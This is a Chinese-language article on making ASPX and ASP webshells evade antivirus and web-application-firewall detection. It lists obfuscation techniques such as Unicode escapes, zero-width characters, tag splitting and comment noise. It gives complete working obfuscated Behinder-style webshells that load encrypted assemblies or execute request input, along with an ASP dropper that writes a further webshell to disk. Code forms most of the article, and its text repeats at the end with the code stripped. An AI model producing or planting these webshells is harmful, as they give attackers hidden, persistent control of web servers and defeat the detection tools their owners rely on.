关于webshell免杀的应用思路
字数 936 2025-08-24 20:49:22

WebShell免杀技术详解:ASPX与ASP类型的高级应用

前言

在攻防对抗场景中,上传WebShell是常见的攻击手段。当攻击者找到上传接口后,通常会经历三个测试阶段:测试后缀限制、测试文件解析能力,最后确认WebShell内容是否被拦截。本文重点针对WebShell内容拦截问题,详细分析ASPX和ASP类型的免杀技术。

一、ASPX类型WebShell免杀技术

1. Unicode编码混淆

ASPX支持Unicode编码转换,可将关键函数名转换为Unicode形式:

<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>

特点:

  • JScript不支持大U和多个0的增加
  • C#支持大U和多个0的增加

2. 零宽字符插入

使用零宽连字符和零宽不折行空格插入函数字符串中:

<%c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);%>

可用字符:

  • 零宽连字符:\u200c, \u200d, \u200e, \u200f
  • 零宽不折行空格:\ufeff, \u202a, \u202b, \u202c, \u202d, \u202e

3. <%%>语法分割

利用多个<%%>标签分割代码:

<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c%><%(Request.%>

4. 头部声明变体

多种头部声明方式:

<%@Page Language="csharp"%>
<%@ Page Language="Jscript"%>
<%@Page Language=JS%>
<% @language="Csharp" %>

5. @符号插入

不影响解析的@符号插入:

<%.@CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key))%>

6. 注释混淆

插入注释干扰检测:

<%/*TreeObject*/./*TreeObject*/GetBytes(Session[0] + ""),%>

7. 冗余符号混淆

添加多余的花括号和分号:

<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{{{}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{{{;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>

8. 多种标签风格

ASPX支持多种标签风格:

<% @language="C#" %>
<%Response.Write("hello");%>

<script language=csharp runat=server>
void page_load(){Response.Write("hello");}
</script>

9. 换行特性

利用换行分割代码:

<%
@
language 
= 
c#
%>

10. XML注释特性

C#支持///作为XML注释,可结合换行和Unicode:

<%
@Import 
 Namespace="System.Reflection"%>
<%Session.Add("k",
//////@#@!#!@#!@#!@#!@#!@#!@#
"e45e329feb5d925b"); byte[]
//////@#@!#!@#!@#!@#!@#!@#!@#
 k = Encoding.Default.GetBytes(Session[0] + ""),
//////@#@!#!@#!@#!@#!@#!@#!@#
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); 
//////@#@!#!@#!@#!@#!@#!@#!@#%>

综合免杀示例

结合上述技术的冰蝎马免杀示例:

<%@Import Namespace="System./*TreeObject*/\U00000052\U00000065\U00000066\U0000006C\U00000065\U00000063\U00000074\U00000069\U0000006F\U0000006E"%>
<%\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E/*TreeObject*/.\U00000041\U00000064\U00000064("k","e45e329feb5d925b"); %>
<%byte[] k = \U00000045\U0000006E\U00000063\U0000006F\U00000064\U00000069\U0000006E\U00000067/*TreeObject*/./*TreeObject*/Default%>
<%/*TreeObject*/./*TreeObject*/\U00000047\U00000065\U00000074\U00000042\U00000079\U00000074\U00000065\U00000073(\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#%>
<%c = \U00000052\U00000065\U00000071\U00000075\U00000065\U00000073\U00000074/*TreeObject*/./*TreeObject*/\U00000042\U00000069\U0000006E\U00000061\U00000072\U00000079\U00000052\U00000065\U00000061\U00000064/*TreeObject*/(Request.ContentLength);//////@#@!#!@#!@#!@#!@#!@#!@#/*TreeObject*/%>
<%Assembly/*TreeObject*/./*TreeObject*/@\U0000004C\U0000006F\U00000061\U00000064(new System./*TreeObject*/Security%>
<%./*TreeObject*/@\U00000043\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000067\U00000072\U00000061\U00000070\U00000068\U00000079.\U00000052\U00000069\U0000006A\U0000006E\U00000064\U00000061\U00000065\U0000006C\U0000004D\U00000061\U0000006E\U00000061\U00000067\U00000065\U00000064()%>
<%./*TreeObject*/@\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U00000044\U00000065\U00000063\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000072(k, k)%>
<%./*TreeObject*/@\U00000054\U00000072\U00000061\U0000006E\U00000073\U00000066\U0000006F\U00000072\U0000006D\U00000046\U00000069\U0000006E\U00000061\U0000006C\U00000042\U0000006C\U0000006F\U00000063\U0000006B(c, 0, c.Length))%>
<%./*TreeObject*/\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U0000202c\U00000049\U0000006E\U00000073\U00000074\U00000061\U0000006E\U00000063\U00000065/*TreeObject*/%>
<%(/*TreeObject*/"U"/*TreeObject*/%>
<%)%>
<%./*TreeObject*/\U00000045\U00000071\U00000075\U00000061\U0000006C\U00000073(this);{{{;}}}%>
<% @language="CSHARP" %>

二、ASP类型WebShell免杀技术

1. 变量赋值替换

通过变量赋值替换关键函数,免杀D盾:

<%dim a(5)%><%a(0) = request("404")%><%b = LTrim(a(0))%><%response.write("hello")%><%eXecUTe(b)%>

2. 冰蝎马免杀示例

结合变量赋值和换行特性:

<%Response.write("Welcome,This is a TestPage")%><%dim a(5)%><%Response.CharSet = "UTF-8"%> <%k="3b0c14770e6bd663" %><%Session("k")=k%><%size=Request.TotalBytes%><%content=Request.BinaryRead(size)%><%For i=1 To size%><%x=ascb(midb(content,i,1))%><%y=Asc(Mid(k,(i and 15)+1,1))%><%result=result&Chr(x Xor y)%><%a(0)=result%><%b = LTrim(a(0))%><%Next%>
<%
<!--
exEcUTe(b)
-->
%>

3. 中间文件写入技术

通过上传具有写文件功能的中间马,再写入WebShell:

写入文件代码:

Server.CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(Server.MapPath(\"TypeError.asp\"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))

辅助函数定义:

Function JXMD(MM):
MM = Split(MM,"-")
For x=0 To Ubound(MM)
JXMD=JXMD&Chr(MM(x))
Next
End Function

Function HexToStr(ByRef strHex)
Dim Length
Dim Max
Dim Str
Max = Len(strHex)
For Length = 1 To Max Step 2
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
Next
HexToStr = Str
End function

最终免杀形式:

<%
<!--
Function JXMD(MM):
MM = Split(MM,"-")
For x=0 To Ubound(MM)
JXMD=JXMD&Chr(MM(x))
Next
End Function

Function HexToStr(ByRef strHex)
Dim Length
Dim Max
Dim Str
Max = Len(strHex)
For Length = 1 To Max Step 2
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
Next
HexToStr = Str
End function

eXecUTe(JXMD("83-101-114-118-101-114-46-67-114-101-97-116-101-79-98-106-101-99-116-40-34-83-99-114-105-112-116-105-110-103-46-70-105-108-101-83-121-115-116-101-109-79-98-106-101-99-116-34-41-46-79-112-101-110-84-101-120-116-70-105-108-101-40-83-101-114-118-101-114-46-77-97-112-80-97-116-104-40-34-84-121-112-101-69-114-114-111-114-46-97-115-112-34-41-44-50-44-84-114-117-101-41-46-87-114-105-116-101-76-105-110-101-40-72-101-120-84-111-83-116-114-40-34-51-99-50-53-55-50-54-53-55-51-55-48-54-102-54-101-55-51-54-53-50-101-55-55-55-50-54-57-55-52-54-53-50-56-50-50-54-56-54-53-54-99-54-99-54-102-50-50-50-57-50-53-51-101-34-41-41"))

-->
%>

总结

本文详细介绍了ASPX和ASP类型WebShell的多种免杀技术,包括Unicode编码、零宽字符插入、语法分割、头部变体、符号插入、注释混淆、冗余符号、多种标签风格、换行特性、XML注释特性等高级技术。这些技术可以单独使用,也可以组合应用,以达到绕过安全检测的目的。在实际应用中,攻击者通常会根据目标环境选择最适合的免杀方法。

WebShell免杀技术详解:ASPX与ASP类型的高级应用 前言 在攻防对抗场景中,上传WebShell是常见的攻击手段。当攻击者找到上传接口后,通常会经历三个测试阶段:测试后缀限制、测试文件解析能力,最后确认WebShell内容是否被拦截。本文重点针对WebShell内容拦截问题,详细分析ASPX和ASP类型的免杀技术。 一、ASPX类型WebShell免杀技术 1. Unicode编码混淆 ASPX支持Unicode编码转换,可将关键函数名转换为Unicode形式: 特点: JScript不支持大U和多个0的增加 C#支持大U和多个0的增加 2. 零宽字符插入 使用零宽连字符和零宽不折行空格插入函数字符串中: 可用字符: 零宽连字符:\u200c, \u200d, \u200e, \u200f 零宽不折行空格:\ufeff, \u202a, \u202b, \u202c, \u202d, \u202e 3. <%%>语法分割 利用多个 <%%>标签分割代码: 4. 头部声明变体 多种头部声明方式: 5. @符号插入 不影响解析的@符号插入: 6. 注释混淆 插入注释干扰检测: 7. 冗余符号混淆 添加多余的花括号和分号: 8. 多种标签风格 ASPX支持多种标签风格: 9. 换行特性 利用换行分割代码: 10. XML注释特性 C#支持///作为XML注释,可结合换行和Unicode: 综合免杀示例 结合上述技术的冰蝎马免杀示例: 二、ASP类型WebShell免杀技术 1. 变量赋值替换 通过变量赋值替换关键函数,免杀D盾: 2. 冰蝎马免杀示例 结合变量赋值和换行特性: 3. 中间文件写入技术 通过上传具有写文件功能的中间马,再写入WebShell: 写入文件代码: 辅助函数定义: 最终免杀形式: 总结 本文详细介绍了ASPX和ASP类型WebShell的多种免杀技术,包括Unicode编码、零宽字符插入、语法分割、头部变体、符号插入、注释混淆、冗余符号、多种标签风格、换行特性、XML注释特性等高级技术。这些技术可以单独使用,也可以组合应用,以达到绕过安全检测的目的。在实际应用中,攻击者通常会根据目标环境选择最适合的免杀方法。